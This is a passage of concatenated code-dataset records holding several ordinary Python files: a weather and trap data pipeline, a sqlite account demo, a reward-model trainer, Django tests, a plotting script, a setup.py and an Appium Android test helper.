pd.DataFrame(toRet, index = df.index)\n toRet.columns = [tpe + str(c) for c in toRet.columns]\n\n return toRet\n\n # Code to fit, then transform for Water, then park SVDs,\n # given already calculated data from above function.\n # Will then be 
passed to merge, by location, on to main data\n\n toRetTrain = []\n toRetTest = []\n for t in ['W', 'P']:\n sTrain = find_cols(train, t)\n sTest = find_cols(test,t)\n sTSVD = yeildFitTSVD(sTrain)\n\n toRetTrain.append(transformTSVD(sTrain, sTSVD, t))\n toRetTest.append(transformTSVD(sTest, sTSVD, t))\n\n toRetTrain = pd.concat(toRetTrain, axis = 'columns')\n toRetTest = pd.concat(toRetTest, axis = 'columns')\n\n return toRetTrain, toRetTest\n\n#####\n# Weather processing takes in weather data, aggregates for week previous to\n# observations.\n# Thus weather is aggregated for each Daterange, for each location\ndef WeatherProcess(train, test):\n\n # Preprocessing weather information, dropping columns,\n # recasting data types\n def yeildWeather(target):\n weather = pd.read_csv(target)\n weather['Date'] = pd.to_datetime(weather['Date'])\n\n toDrop = ['Depart', 'Depth','Water1',\n 'SnowFall', 'CodeSum', 'Heat',\n 'Cool', 'Sunrise']\n weather = weather.drop(toDrop, axis=1)\n\n toReplace = {'M':np.nan, ' T': 0.001, '-': '0000'}\n for k in toReplace:\n weather = weather.replace(k, toReplace[k])\n\n\n toFloats = ['Tavg', 'WetBulb', 'PrecipTotal','StnPressure',\n 'SeaLevel', 'ResultSpeed','AvgSpeed']\n for c in toFloats:\n weather[c] = weather[c].astype(float)\n\n # Some errors found in sunset have, e.g. 7:00 pm as '1860'\n weather['Sunset'] = [date\n if date[-2:] != '60'\n else str(int(date[0:2])+1)+'00'\n for date in weather['Sunset']]\n\n weather['Sunset'] = pd.to_datetime(weather['Sunset'],\n format=\"%H%M\")\n weather.dropna(inplace=True)\n\n return weather[weather['Station']== 1]\n\n # Create a function that will model average temperature per week\n # Take weekly temperature averages, then model a quadradic linear model\n # then create dictionary that includes predictions for that model\n def yeildAvgTemp(weather):\n weather['Wk'] = weather['Date'].dt.week\n weekTemp = pd.DataFrame(\n weather.groupby('Wk')['Tavg'].mean())\n weekTemp['Week'] = weekTemp.index - 17\n weekTemp['Week^2'] = weekTemp['Week']**2\n\n lr = LinearRegression().fit(weekTemp.drop('Tavg', axis = 'columns'),\n weekTemp['Tavg'])\n toRet = {}\n for w in range(1,53):\n toRet[w] = lr.intercept_ + (lr.coef_[0]*(w-17)) + (lr.coef_[1] * ((w-17)**2))\n\n return toRet\n\n # Given a subset of the weather dataframe, calculate averages, maxes, mins\n # etc.\n # Will be merged upon final date of weather subset\n def calculate_agregate( weather_sub, avgTDict):\n toRet = pd.Series()\n\n allAgg = [np.max, np.min, np.mean]\n toAgg = {'DewPoint': allAgg,\n 'StnPressure': allAgg,\n 'AvgSpeed': allAgg,\n 'Tmax':[np.max],\n 'Tmin':[np.min],\n 'Tavg':[np.mean],\n 'PrecipTotal':[np.sum, np.mean]\n }\n for k in toAgg:\n for f in toAgg[k]:\n toRet.loc[k + str(f).split(' ')[1]] = f(weather_sub[k])\n\n finalEntry = weather_sub.iloc[len(weather_sub)-1]\n\n toRet['temp_expected'] = avgTDict[pd.to_datetime(finalEntry['Date']).week]\n toRet['temp_diff'] = toRet['Tavgmean'] - toRet['temp_expected']\n\n sunset = finalEntry['Sunset']\n toRet['sunset'] = sunset.hour + (sunset.minute / 60)\n\n return toRet\n\n # Given a set of dates, create date ranges to subset weather.\n # Date ranges are either the time between trap observations, or, one week prior\n # to the first observation in a year\n def date_ranges(dates):\n uniqueYears = set([pd.to_datetime(d).year for d in dates])\n\n dates = sorted(dates)\n fyear = []\n for y in uniqueYears:\n for d in dates:\n if pd.to_datetime(d).year == y:\n fyear.append(d)\n break\n\n for d in fyear:\n dates = np.insert(dates, 
0, d - pd.Timedelta(days = 8))\n\n dates = sorted(dates)\n\n dateRanges = []\n for i in range(len(dates)-1):\n if pd.to_datetime(dates[i]).year == pd.to_datetime(dates[i+1]).year:\n dateRanges.append( (dates[i], dates[i+1]) )\n\n return dateRanges\n\n # create the subset of the weather data\n def subset_weather(dateRange, weather):\n mask = (weather['Date']>dateRange[0]) & (weather['Date'] <= dateRange[1])\n return weather.loc[mask]\n\n # create a dataframe that can be easily merged onto observations\n # merging by date and trap\n def TWeatherDFMaker(dct):\n toRet = pd.DataFrame().from_dict(dct)\n toRet = toRet.transpose()\n toRet.index = [idx for idx in toRet.index]\n toRet['Trap'] = toRet.index.map(lambda x: x[0])\n toRet['Date'] = toRet.index.map(lambda x: x[1])\n toRet.index = range(len(toRet))\n\n return toRet\n\n # For a single trap, call functions to aggregate weather\n def trap_agregator(trap_df, weather, avgTDict):\n trapWeather = {}\n trap = trap_df['Trap'].iloc[0]\n\n dates = trap_df['Date'].unique()\n dates = sorted(dates)\n\n dateRanges = date_ranges(dates)\n\n for dr in dateRanges:\n weather_sub = subset_weather(dr, weather)\n trapWeather[(trap, dr[1])] = calculate_agregate(weather_sub, avgTDict)\n toRet = pd.DataFrame().from_dict(trapWeather)\n\n return TWeatherDFMaker(trapWeather)\n\n # Take in data frame, output dataframe with aggregated weather to be merged\n\n def transform(df):\n observations = []\n\n traps = df['Trap'].unique()\n for t in traps:\n observations.append(trap_agregator(df[df['Trap'] == t],\n weather, avgTDict))\n toRet = pd.concat(observations, axis = 'rows')\n\n return toRet\n\n weatherTarget = './input/weather.csv'\n weather = yeildWeather(weatherTarget)\n avgTDict = yeildAvgTemp(weather)\n\n return transform(train), transform(test)\n\n# run steps in order, Print stubs deprecated for making sure dataframes\n# stay correct size\ndef ProcessPipeline(train, test):\n train, test = agg_on_species(train, test)\n #print('0',test.shape)\n train, test = InitPrepross(train, test)\n #print('1',test.shape)\n trainW, testW = WeatherProcess(train, test)\n\n trainL, testL = LocationProcess(train, test)\n trainL, testL = SVD(trainL, testL)\n\n train = train.merge(trainL, left_on = 'Location', right_index = True)\n test = test.merge(testL, left_on = 'Location', right_index = True)\n #print('3',test.shape)\n train = train.merge(trainW, on = ['Trap','Date'])\n test = test.merge(testW,on = ['Trap','Date'])\n #print('2',test.shape)\n\n return train, test\n","sub_path":"ProcessPipeline.py","file_name":"ProcessPipeline.py","file_ext":"py","file_size_in_byte":14250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"529391110","text":"import sqlite3\nimport pytz\nimport datetime\n\"\"\"The modification in this codes from rollback1 is the {:.2f}\n just to avoid an error of floating in the end results and inexact amount\"\"\"\n\ndb = sqlite3.connect(\"accounts.sqlite\", detect_types=sqlite3.PARSE_DECLTYPES)\ndb.execute(\"CREATE TABLE IF NOT EXISTS accounts(name TEXT PRIMARY KEY NOT NULL,\"\n \"balance INTEGER NOT NULL)\") #Accounts table\ndb.execute(\"CREATE TABLE IF NOT EXISTS histories(time TIMESTAMP NOT NULL, account TEXT NOT NULL, \"\n \"amount INTEGER NOT NULL, PRIMARY KEY(time, account))\")\n#create a view from histories\ndb.execute(\"CREATE VIEW IF NOT EXISTS localhistory AS \"\n \"SELECT strftime('%Y-%m-%d %H:%M:%f', histories.time, 'localtime') AS localtime,\"\n \"histories.account, histories.amount FROM histories 
ORDER BY histories.time\")\n\nclass Account:\n \"\"\"Creating an acount with name\"\"\"\n @staticmethod\n def _current_time():\n return pytz.utc.localize(datetime.datetime.utcnow())\n\n def __init__(self, name: str, balance: int = 0):\n\n cursor = db.execute(\"SELECT name, balance FROM accounts WHERE (name = ?)\", (name,))\n row = cursor.fetchone()\n\n if row:\n self._name, self._balance = row\n print(\"Data retrieved for {}.\".format(self._name), end=\" \")\n else:\n self._name = name\n self._balance = balance\n cursor.execute(\"INSERT INTO accounts VALUES(?, ?)\", (name, balance))\n cursor.connection.commit()\n print(\"The account created for {}\".format(self._name))\n self.show_balance()\n\n def save_update(self, amount): # Created this to save the identical codes in deposit and withraw (commented)\n new_balance = self._balance + amount\n deposit_time = Account._current_time()\n db.execute(\"UPDATE accounts SET balance = ? WHERE (name = ?)\", (new_balance, self._name))\n db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (deposit_time, self._name, amount))\n db.commit()\n self._balance = new_balance\n\n def deposit(self, amount: int) -> float: # creating a deposit method\n if amount > 0:\n # new_balance = self._balance + amount\n # deposit_time = Account._current_time()\n # db.execute(\"UPDATE accounts SET balance = ? WHERE (name = ?)\",(new_balance, self._name))\n # db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (deposit_time, self._name, amount))\n # db.commit()\n # self._balance = new_balance\n self.save_update(amount)\n print(\"{:.2f} has been deposited on {}'s Account\".format(amount / 100, self._name))\n return self._balance / 100\n\n def withdraw(self, amount: int) -> float:\n if 0.0 < amount <= self._balance:\n # new_balance = self._balance - amount\n # withraw_time = Account._current_time()\n # db.execute(\"UPDATE accounts SET balance = ? 
WHERE (name = ?)\", (new_balance, self._name))\n # db.execute(\"INSERT INTO histories VALUES(?, ?, ?)\", (withraw_time, self._name, -amount))\n # db.commit()\n # self._balance\n self.save_update(-amount)\n print(\"{:.2f} is withdrawn from {}'s Account\".format(amount / 100, self._name))\n return amount / 100\n else:\n print(\"THE AMOUNT HAS TO BE BETWEEN ZERO AND YOUR BALANCE\")\n return 0.0\n\n def show_balance(self): # a method that will display the balance\n print(\"The balance on {}'s account is {:.2f}\".format(self._name, self._balance / 100))\n\n\nif __name__ == '__main__':\n peter = Account(\"Peter\")\n peter.deposit(1010)\n peter.deposit(20)\n peter.withdraw(30)\n\n print(\"-\" * 40)\n\n vavic = Account(\"Evariste\")\n vavic.deposit(2010)\n vavic.deposit(40)\n vavic.withdraw(120)\n\n print(\"-\" * 40)\n jeanne = Account(\"Jeanne\")\n dianah = Account(\"Dianah\", 100)\n octave = Account(\"Octave\", 300)\n alex = Account(\"Alex\")\n donny = Account(\"Donny\", 500)\n\n db.close()\n","sub_path":"CreateDB/TestDB/rollback2.py","file_name":"rollback2.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"47607682","text":"from abc import ABC, abstractmethod\n\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom models.choice import ChoiceModel\n\n\nclass AbstractRewardTrainerMixin(ABC):\n\n @abstractmethod\n def train_reward_model(self, preferences, epochs, pretraining=False, *args, **kwargs):\n pass\n\n\nclass RewardTrainerMixin(AbstractRewardTrainerMixin):\n def __init__(self, reward_model, batch_size=64, learning_rate=1e-3, summary_writing_interval=16):\n AbstractRewardTrainerMixin.__init__(self)\n self.choice_model = ChoiceModel(reward_model)\n self.optimizer = optim.Adam(self.choice_model.parameters(), lr=learning_rate)\n self.criterion = F.binary_cross_entropy\n self.batch_size = batch_size\n self.writer = SummaryWriter()\n self.writing_interval = summary_writing_interval\n self.global_training_step = 0\n\n def train_reward_model(self, preferences, epochs, pretraining=False, *args, **kwargs):\n train_loader = torch.utils.data.DataLoader(dataset=preferences, batch_size=self.batch_size)\n\n running_loss = 0.\n for epoch in range(epochs):\n\n for i, data in enumerate(train_loader, 0):\n queries, choices = data\n\n self.optimizer.zero_grad()\n\n choice_predictions = self.choice_model(queries).double()\n loss = self.criterion(choice_predictions, choices)\n\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n\n if self._is_writing_iteration(self.global_training_step):\n self._write_summary(running_loss, pretraining)\n running_loss = 0.0\n\n self.global_training_step += 1\n\n if pretraining:\n # reset global step after every round of pretraining\n self.global_training_step = 0\n\n def _is_writing_iteration(self, i):\n return i % self.writing_interval == self.writing_interval - 1\n\n def _write_summary(self, running_loss, pretraining):\n tag = \"training loss\"\n tag += \" (pretraining)\" if pretraining else \"\"\n average_loss = running_loss / self.writing_interval\n self.writer.add_scalar(tag,\n average_loss,\n self.global_training_step)\n","sub_path":"reward_model_training/reward_trainer.py","file_name":"reward_trainer.py","file_ext":"py","file_size_in_byte":2421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"91795914","text":"from collections import Counter\r\nfrom decimal import Decimal\r\nfrom random import seed\r\n\r\nfrom django.urls import reverse\r\nfrom rest_framework.test import APITestCase\r\nfrom rest_framework import status\r\n\r\nfrom calculator.models.blackbox import BlackBox, BlackBoxItem\r\nfrom calculator.models.product import Product\r\nfrom calculator.utils.blackbox import LOT_CATEGORIES\r\n\r\n\r\nseed(42)\r\n\r\n\r\nclass MockOpenTest(APITestCase):\r\n @classmethod\r\n def tearDownClass(cls):\r\n Product.objects.all().delete()\r\n super().tearDownClass()\r\n\r\n @classmethod\r\n def setUpClass(cls):\r\n super().setUpClass()\r\n cls.products = [Product.objects.create(name=f'Product #{i}',\r\n price=1000) for i in range(3)]\r\n for product in cls.products:\r\n product.save()\r\n\r\n cls.bb_1 = cls.create_bb('Box 1', 2000, cls.products, [1, 1, 1])\r\n cls.bb_2 = cls.create_bb('Box 2', 2000, cls.products, [10, 20, 30])\r\n\r\n @staticmethod\r\n def create_bb(name, price, products, amounts):\r\n bb = BlackBox.objects.create(name=name, price=price, loyalty=0.6, rentability=0.3)\r\n items = [BlackBoxItem.objects.create(\r\n black_box=bb, product=product, amount=amount\r\n ) for product, amount in zip(products, amounts)]\r\n for item in items:\r\n item.save()\r\n bb.save()\r\n return bb\r\n\r\n def test_mock_open_small(self):\r\n res = self.bb_1.mock_open(3)\r\n self.assertEqual(set(res), set(LOT_CATEGORIES))\r\n res = self.bb_1.mock_open(0)\r\n self.assertEqual(res, [])\r\n\r\n def test_mock_open_large(self):\r\n res = self.bb_2.mock_open(60)\r\n self.assertEqual(Counter(res), Counter(\r\n {'costly': 10, 'middle': 20, 'cheap': 30}\r\n ))\r\n res = self.bb_2.mock_open(1000)\r\n self.assertEqual(Counter(res), Counter(\r\n {'costly': 10, 'middle': 20, 'cheap': 30}\r\n ))\r\n\r\n def test_api(self):\r\n pk = self.bb_1.pk\r\n response = self.client.post(reverse('blackbox-detail', args=[pk]) + 'mock_open/', data={'n': 10})\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n data = response.json()\r\n self.assertEqual(set(data['product_categories']), set(LOT_CATEGORIES))\r\n\r\n def test_rentability_is_never_negative(self):\r\n products = [Product.objects.create(name=f'Product {i}', price=i*100) for i in range(1, 4)]\r\n bb = self.create_bb('Box 3', 170, products, [1, 2, 3])\r\n cat_map = bb.lot_cost()\r\n for _ in range(10):\r\n res = bb.mock_open(6)\r\n total_giveaway = 0\r\n for i, category in enumerate(res):\r\n total_giveaway += cat_map[category]\r\n self.assertLessEqual(total_giveaway, Decimal((i + 1) * 170), msg=f'{i}th iteration')\r\n\r\n def test_mock_open_unsaved_api(self):\r\n data = {\r\n 'name': 'Box 3',\r\n 'price': 170,\r\n 'lot_cost': {'costly': 300, 'middle': 200, 'cheap': 100},\r\n 'lot_amount': {'costly': 1, 'middle': 2, 'cheap': 3},\r\n 'n': 6\r\n }\r\n response = self.client.post(reverse('blackbox-list') + 'mock_open_unsaved/',\r\n data=data, format='json')\r\n self.assertEqual(response.status_code, status.HTTP_200_OK)\r\n res = response.json()['product_categories']\r\n self.assertEqual(Counter(res), Counter(data['lot_amount']))\r\n","sub_path":"gamification/calculator/tests/test_mock_open.py","file_name":"test_mock_open.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"52653243","text":"#!/usr/bin/env python\n# Plot heatmap of MinHash sketch comparisons by BBTool's sketch.sh/comparesketch.sh.\n# Fredrik Boulund 2018\n\nfrom sys import argv, 
exit\nimport argparse\n\nimport matplotlib as mpl\nmpl.use(\"agg\")\nmpl.rcParams.update({'figure.autolayout': True})\n\nimport pandas as pd\nimport seaborn as sns\n\n\ndef parse_args():\n desc = \"Plot heatmap of sketch comparisons.\"\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument(\"alltoall\", metavar=\"alltoall\",\n help=\"Output table from comparesketch.sh in format=3.\")\n parser.add_argument(\"-o\", \"--outfile\", dest=\"outfile\", metavar=\"FILE\",\n default=\"all_vs_all.pdf\",\n help=\"Write heatmap plot to FILE [%(default)s].\")\n if len(argv) < 2:\n parser.print_help()\n exit(1)\n\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n options = parse_args()\n \n colnames = [\"Query\", \"Ref\", \"ANI\", \"QSize\", \"RefSize\", \"QBases\"]\n df = pd.read_csv(\n options.alltoall, \n sep=\"\\t\", \n index_col=False, \n skiprows=1,\n names=colnames)\n print(\"Loaded data for {} sample comparisons.\".format(df.shape[0]))\n\n similarity_matrix = df.pivot(index=\"Query\", \n columns=\"Ref\", values=\"ANI\").fillna(100)\n\n g = sns.heatmap(similarity_matrix, annot=True, fmt=\"2.1f\", annot_kws={\"fontsize\": 5})\n g.set_title(\"Sample similarity\")\n g.set_yticklabels(g.get_yticklabels(), rotation=0)\n g.set_ylabel(\"\")\n g.set_xlabel(\"\")\n\n g.get_figure().savefig(options.outfile)\n","sub_path":"scripts/plot_sketch_comparison_heatmap.py","file_name":"plot_sketch_comparison_heatmap.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443008960","text":"#!/usr/bin/env python\n\"\"\"\n\nCopyright (c) 2019, Kristoffer Paulsson \n\nThis file is distributed under the terms of the MIT license.\n\n\nArchive7 cython build script.\"\"\"\nfrom glob import glob\nfrom os import path\nfrom setuptools import setup, Extension\nfrom Cython.Build import cythonize\n\n\nbase_dir = path.abspath(path.dirname(__file__))\n\nwith open(path.join(base_dir, 'README.md')) as desc:\n long_description = desc.read()\n\nwith open(path.join(base_dir, 'version.py')) as version:\n exec(version.read())\n\nsetup(\n name=\"archive7\",\n version=__version__, # noqa F821\n license='MIT',\n description='A safe messaging system',\n author=__author__, # noqa F821\n author_email=__author_email__, # noqa F821\n long_description=long_description, # noqa F821\n long_description_content_type='text/markdown',\n url=__url__, # noqa F821\n # project_urls={\n # \"Bug Tracker\": \"https://bugs.example.com/HelloWorld/\",\n # \"Documentation\": \"https://docs.example.com/HelloWorld/\",\n # \"Source Code\": \"https://code.example.com/HelloWorld/\",\n # }\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Environment :: Console',\n 'Environment :: MacOS X',\n 'Environment :: Win32 (MS Windows)',\n 'Environment :: X11 Applications :: Gnome',\n 'Framework :: AsyncIO',\n 'Intended Audience :: Developers',\n 'Intended Audience :: Information Technology',\n 'Intended Audience :: Religion',\n 'Intended Audience :: System Administrators',\n 'Intended Audience :: Telecommunications Industry',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX',\n 'Programming Language :: Cython',\n 'Programming Language :: Python :: 3.7',\n 'Topic :: Security',\n 'Topic :: System :: Archiving',\n 'Topic :: Utilities',\n ],\n zip_safe=False,\n test_suite='',\n python_requires='~=3.7',\n setup_requires=[\n 'cython', 'sphinx', 'sphinx_rtd_theme', 'libnacl'],\n install_requires=[],\n # 
namespace_packages=['archive7'],\n packages=['archive7'],\n scripts=glob('bin/*'),\n ext_modules=cythonize(\n 'src/archive7/**.pyx',\n build_dir=\"build\", compiler_directives={\n 'language_level': 3, 'embedsignature': True})\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"225758882","text":"#!/usr/bin/env python3\n\n############################################################################################\n# #\n# Program purpose: Create an intersection of sets. #\n# Program Author : Happi Yvan #\n# Creation Date : December 24, 2019 #\n# #\n############################################################################################\n\nfrom random import randint\n\ndef random_set_data(low: int, high: int, size: int) -> set:\n if size < 0:\n raise ValueError(f'Invalid size ({size}) for new set')\n return set([randint(low, high) for _ in range(size)])\n\nif __name__ == \"__main__\":\n set_A = random_set_data(low=0, high=10, size=15)\n set_B = random_set_data(low=0, high=10, size=15)\n\n print(f'Set A: {set_A}')\n print(f'Set B: {set_B}')\n print(f'Intersection of sets: {set_A & set_B}')","sub_path":"Projects/Online Workouts/w3resource/Sets/program-6.py","file_name":"program-6.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"46112669","text":"# -*- coding: utf-8 -*-\n\nimport time\nimport os\n\nimport datetime\n\nimport re\nfrom appium import webdriver\nfrom appium.webdriver.webelement import WebElement\n\nfrom Framework.Utils.Validate import validate\nfrom Framework.Exception import ATException\nfrom Framework import Log\nfrom UserControlLib.Manager import Manager\nfrom UserControlLib.Page.MainPageBase import MainPageBase\nfrom UserControlLib.Page.PageBase import PageBase\n\n\nclass AndroidPhone(object):\n NAME_LIST = {}\n\n @validate(command_executor=str, params=dict)\n def __init__(self, command_executor='http://127.0.0.1:4444/wd/hub', params=dict()):\n \"\"\"create a AndroidPhone\n Args:\n params(dict):\n like: params = {\n 'platformName': {'types': str, 'optional': False},\n 'platformVersion': {'types': str, 'optional': False},\n 'deviceName': {'types': str, 'optional': False},\n 'appPackage': {'types': str, 'optional': False},\n 'app': {'types': str, 'optional': True}\n }\n \"\"\"\n self.logger = Log.getLogger(self.__module__)\n self.desired = {}\n self.id = params.pop('id')\n self.platform = 'Android'\n while params['name'] in AndroidPhone.NAME_LIST:\n params['name'] += str(time.time())\n AndroidPhone.NAME_LIST.update({self.id: params['name']})\n self.name = params['name']\n\n self.desired['platformName'] = self.platform\n self.desired['platformVersion'] = params.get('version')\n self.desired['deviceName'] = params.get('name')\n self.desired['appPackage'] = params.get('app_package')\n self.desired['app'] = os.path.abspath(params.get('app_location'))\n self.desired['unicodeKeyboard'] = True\n self.desired['resetKeyboard'] = True\n self.desired['newCommandTimeout'] = 240\n\n self.account = params.get('account', {})\n self.logger.debug('To connect an android device: \\n Platform[%s]\\n Version[%s]\\n Name[%s]'\n % (self.desired['platformName'], self.desired['platformVersion'], self.desired['deviceName']))\n self.command_executor = command_executor\n self.driver = None\n self.__lastPage = None\n self.__currentPage = None\n self.pageManager = 
Manager(self)\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.width = 480\n self.height = 800\n if self.driver:\n size = self.driver.get_window_size()\n self.width = size['width']\n self.height = size['height']\n self.logger.debug('The Android[%s] window size: width[%s] height[%s].' %\n (self.getPhoneId(), str(self.width), str(self.height)))\n\n def __waitInitComplete(self):\n self.__lastPage = None\n self.__currentPage = self.pageManager.getSpecPage(self, 'Welcome')\n sign = False\n timeIndex = int(time.time())\n while int(time.time()) - timeIndex <= 30:\n try:\n ele = self.getElement(alias='start', force=True)\n except Exception:\n time.sleep(1)\n continue\n else:\n if not ele:\n time.sleep(1)\n continue\n sign = True\n break\n if sign:\n self.logger.debug('The initialization of Android device [%s] is complete.' % self.id)\n else:\n self.logger.error('The initialization of Android device [%s] timed out after 30 seconds.' % self.id)\n\n def __initDriver(self, command_executor, params):\n self.driver = webdriver.Remote(command_executor, params, keep_alive=True)\n self.__waitInitComplete()\n\n def getElement(self, alias=None, force=False, way='xpath', text=None):\n \"\"\"To get a WebElement instance of specified alias\n Args:\n way (str) : element lookup method, defaults to 'xpath'; 'xpath', 'id' and 'name' are available\n alias (str) : element alias\n force (str) : whether to force the lookup\n text (str) : when way is xpath, overrides the xpath text filter attribute; if text is ignore, the text filter attribute is dropped\n \"\"\"\n try:\n ele = self.__currentPage.getElement(alias=alias, force=force, way=way, text=text)\n except Exception as e:\n raise ATException(e.message)\n else:\n return ele\n\n def getSpecElementText(self, element=None, alias=None):\n \"\"\"To get the text value of a WebElement instance\n Args:\n element (WebElement) : the element to read\n alias (str) : element alias\n \"\"\"\n txt = ''\n if element and isinstance(element, WebElement):\n try:\n txt = element.text.encode('utf-8')\n except Exception as e:\n pass\n else:\n txt = element.text\n elif alias and isinstance(alias, str):\n ele = self.getElement(alias=alias, force=True)\n try:\n txt = ele.text.encode('utf-8')\n except Exception as e:\n txt = ele.text\n\n else:\n raise ATException('Method getSpecElementText() must give a param element(WebElement) or alias(str).')\n self.logger.debug('The text value of the specified element is \'%s\'.' % txt)\n return txt\n\n def doAction(self, alias=None, element=None, action=None, value=None, text=None):\n \"\"\"deal with the events of an element\n\n Args:\n alias (str) : the element's alias in the xml file, mutually exclusive with element\n\n element (WebElement): the element that handles the event, mutually exclusive with alias\n\n action (str) : event name\n name | description\n =================================\n click | click the element\n double_click | double-click the element\n swipe_up | swipe up\n swipe_down | swipe down\n swipe_right | swipe right\n swipe_left | swipe left\n scroll_vertical | scroll the element vertically\n scroll_transverse| scroll the element horizontally\n input | type characters\n\n value (str) : the characters to type\n\n text: (str) : when the alias param is given, overrides the xpath text filter attribute; if text is ignore, the text filter attribute is dropped\n \"\"\"\n if alias:\n ele = self.getElement(alias=alias, text=text)\n if not ele:\n raise ATException('The WebElement alias[%s] can not be located in current page[%s]'\n % (alias, self.getCurrentPage().getTitle()))\n self.logger.info(\"In current page [%s], the located element is [%s] and will do action [%s].\"\n % (self.__currentPage.getTitle(), alias, action))\n self.getCurrentPage().doAction(element=ele, action=action, value=value)\n elif element:\n if isinstance(element, WebElement):\n self.logger.info(\"In current page [%s], the located element is [%s] and will do action [%s].\"\n %\n (self.getCurrentPage().getTitle(), self.getCurrentPage()._getAlias(element=element), action))\n self.__currentPage.doAction(element=element, action=action, value=value)\n else:\n raise ATException('Function: [doAction] param: [element] must '\n 'be an instance of appium.webdriver.webelement.WebElement, \\nbut is [%s]'\n % type(element))\n else:\n raise ATException('Function: [doAction] param: [element] or [alias] must '\n 'be specified, and only one of them.')\n\n def setCurrentPage(self, page):\n \"\"\"\n \"\"\"\n if isinstance(page, PageBase):\n if page != self.__currentPage:\n self.__lastPage = self.__currentPage\n self.__currentPage = page\n else:\n raise ATException('Object [%s] property must be an instance of PageBase.' % page)\n self.logger.info(\"To set the current page: [%s] successfully.\" % self.__currentPage.getTitle())\n\n def getCurrentPage(self):\n self.logger.info(\"To get the current page: [%s] successfully.\" % self.__currentPage.getTitle())\n return self.__currentPage\n\n def getLastPage(self):\n self.logger.info(\"To get the last page: [%s] successfully.\" % self.__lastPage.getTitle())\n return self.__lastPage\n\n def setLastPage(self, page):\n if isinstance(page, PageBase):\n self.__lastPage = page\n else:\n raise ATException('Object [%s] property must be an instance of PageBase.' % page)\n self.logger.debug(\"To set the last page: [%s] successfully.\" % self.__lastPage.getTitle())\n\n\n def setPhoneId(self, id):\n self.id = id\n\n def getPhoneId(self):\n return self.id\n\n def getScreenShot(self, desPath=None):\n \"\"\"\n \"\"\"\n if self.driver:\n pngName = '%s.png' % datetime.datetime.now().strftime('%Y-%m-%d-%H_%M_%S')\n if desPath:\n pngFile = os.path.join(desPath, pngName)\n else:\n pngFile = os.path.join(Log.baseConfig['logDir'], pngName)\n self.driver.get_screenshot_as_file(pngFile)\n self.logger.info('Capture the screen of the current page [%s] successfully,\\nFile: [%s]'\n % (self.__currentPage.getTitle(), pngFile))\n return\n self.logger.info(\n 'Capture the screen of the current page [%s] failed, because the driver is unavailable.' % self.__currentPage.getTitle())\n\n def __whetherCurrentIsMainPage(self):\n # the main page shows the Home ('首页'), Visits ('出诊') and Mine ('我的') tabs\n try:\n if self.driver.find_element_by_name('首页') and self.driver.find_element_by_name('出诊') \\\n and self.driver.find_element_by_name('我的'):\n return True\n else:\n return False\n except Exception as e:\n return False\n\n def login(self, way=None, name=None, password=None):\n \"\"\"To log in to the APP\n\n Args:\n way (str): login method, 'password' or 'code'\n name (str): login account\n password(str): login password or verification code\n \"\"\"\n if self.__currentPage.getTitle() == 'Welcome':\n self.doAction(alias='start', action='click')\n if not way:\n if self.account['way'] == 'password':\n self.doAction(alias='account_frame', action='swipe_left')\n time.sleep(2)\n self.doAction(alias='username_edit_text', action='input', value=self.account['user'])\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n elif self.account['way'] == 'code':\n self.doAction(alias='user_edit_text', action='input', value=self.account['user'])\n time.sleep(2)\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n if self.getCurrentPage().getTitle() != 'Home_dynamic':\n raise ATException('Login app failed.')\n elif isinstance(self.__currentPage, MainPageBase):\n self.arriveSpecMainPage(main='home')\n else:\n self.rebootApp()\n self.login()\n\n def rebootApp(self):\n \"\"\"reboot app\n \"\"\"\n if self.driver:\n self.driver.quit()\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.__waitInitComplete()\n else:\n self.__initDriver(command_executor=self.command_executor, params=self.desired)\n self.__waitInitComplete()\n\n def __del__(self):\n\n try:\n self.logger.info(\"Exit the connected Android Phone ID: [%s]\" % self.getPhoneId())\n self.driver.quit()\n except ATException:\n pass\n\n def arriveSpecMainPage(self, main='home'):\n \"\"\"Go to the specified main page\n Args\n main (str) : main page name, home, visits, mine, message, circle\n \"\"\"\n if self.__whetherCurrentIsMainPage():\n self.setCurrentPage(self.pageManager.getSpecPage(phone=self, title='Home_dynamic'))\n self.doAction(alias=main, action='click')\n elif self.getCurrentPage().getTitle() == 'Welcome':\n self.login()\n elif re.match('Login', self.getCurrentPage().getTitle()):\n if self.account['way'] == 'password':\n self.doAction(alias='account_frame', action='swipe_left')\n time.sleep(2)\n self.doAction(alias='username_edit_text', action='input', value=self.account['user'])\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n elif self.account['way'] == 'code':\n self.doAction(alias='account_frame', action='swipe_right')\n self.doAction(alias='user_edit_text', action='input', value=self.account['user'])\n time.sleep(2)\n self.doAction(alias='pwd_edit_text', action='input', value=self.account['password'])\n self.doAction(alias='start', action='click')\n else:\n try:\n ele = 